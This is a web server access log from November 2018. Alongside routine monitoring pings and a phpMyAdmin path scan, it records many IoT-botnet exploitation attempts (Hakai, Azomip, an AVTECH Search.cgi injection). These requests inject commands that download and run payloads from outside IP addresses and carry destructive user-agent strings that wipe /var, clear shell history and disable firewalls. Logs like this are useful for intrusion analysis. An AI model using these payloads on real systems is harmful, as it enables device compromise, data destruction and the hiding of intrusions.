132.232.51.137 - - [01/Nov/2018:20:23:46 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:24:22 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:24:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.70.138.171 - - [01/Nov/2018:20:24:25 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
37.70.138.171 - - [01/Nov/2018:20:24:27 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
132.232.51.137 - - [01/Nov/2018:20:24:51 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:25:08 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:25:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:20:25:27 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:25:44 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:26:02 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
41.230.52.147 - - [01/Nov/2018:20:26:07 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.165/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
132.232.51.137 - - [01/Nov/2018:20:26:19 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:26:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.149.189.26 - - [01/Nov/2018:20:26:28 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.106.251/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
132.232.51.137 - - [01/Nov/2018:20:26:38 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
46.119.86.41 - - [01/Nov/2018:20:26:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
132.232.51.137 - - [01/Nov/2018:20:26:50 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
116.64.62.107 - - [01/Nov/2018:20:26:50 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
132.232.51.137 - - [01/Nov/2018:20:26:55 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:27:06 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
14.183.247.163 - - [01/Nov/2018:20:27:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
132.232.51.137 - - [01/Nov/2018:20:27:07 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:27:14 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:27:15 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:20:27:18 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:27:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:28:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.93.20.102 - - [01/Nov/2018:20:28:27 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2018:20:29:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:30:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:31:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:32:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:33:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
81.174.36.186 - - [01/Nov/2018:20:33:40 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:20:34:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.198.115.253 - - [01/Nov/2018:20:35:04 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
149.54.196.179 - - [01/Nov/2018:20:35:12 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
103.106.29.108 - - [01/Nov/2018:20:35:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Nov/2018:20:35:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.35.102.28 - - [01/Nov/2018:20:36:13 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:20:36:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:37:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:38:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
133.209.120.57 - - [01/Nov/2018:20:38:49 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
41.235.185.37 - - [01/Nov/2018:20:38:51 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:20:39:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
187.127.160.119 - - [01/Nov/2018:20:39:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:40:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:41:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.18.216.25 - - [01/Nov/2018:20:41:56 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:20:42:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:43:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.198.126.183 - - [01/Nov/2018:20:43:30 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
197.48.245.0 - - [01/Nov/2018:20:43:55 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:20:44:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:45:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:47:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:48:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:49:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:50:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:51:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.31.208.130 - - [01/Nov/2018:20:52:03 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
76.79.180.52 - - [01/Nov/2018:20:52:11 +0100] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1" 400 329 "-" "Dark"
176.192.113.194 - - [01/Nov/2018:20:52:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:52:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:53:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.93.20.102 - - [01/Nov/2018:20:53:32 +0100] "\x03" 501 316 "-" "-"
177.86.125.12 - - [01/Nov/2018:20:54:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:20:54:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
82.106.3.29 - - [01/Nov/2018:20:54:35 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:20:55:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.197.185.58 - - [01/Nov/2018:20:56:44 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:20:57:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
187.10.190.104 - - [01/Nov/2018:20:57:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Nov/2018:20:58:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:20:59:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:00:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
219.36.148.6 - - [01/Nov/2018:21:01:17 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:01:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:02:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.70.163.156 - - [01/Nov/2018:21:02:55 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:21:03:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:04:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:05:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.35.102.28 - - [01/Nov/2018:21:06:00 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:06:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.234.248.222 - - [01/Nov/2018:21:07:09 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:08:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:09:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:10:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:11:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.145.134.171 - - [01/Nov/2018:21:11:38 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:12:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:13:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
58.191.29.87 - - [01/Nov/2018:21:13:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:14:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.217.28.90 - - [01/Nov/2018:21:14:39 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
197.41.161.0 - - [01/Nov/2018:21:15:11 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:16:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:17:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
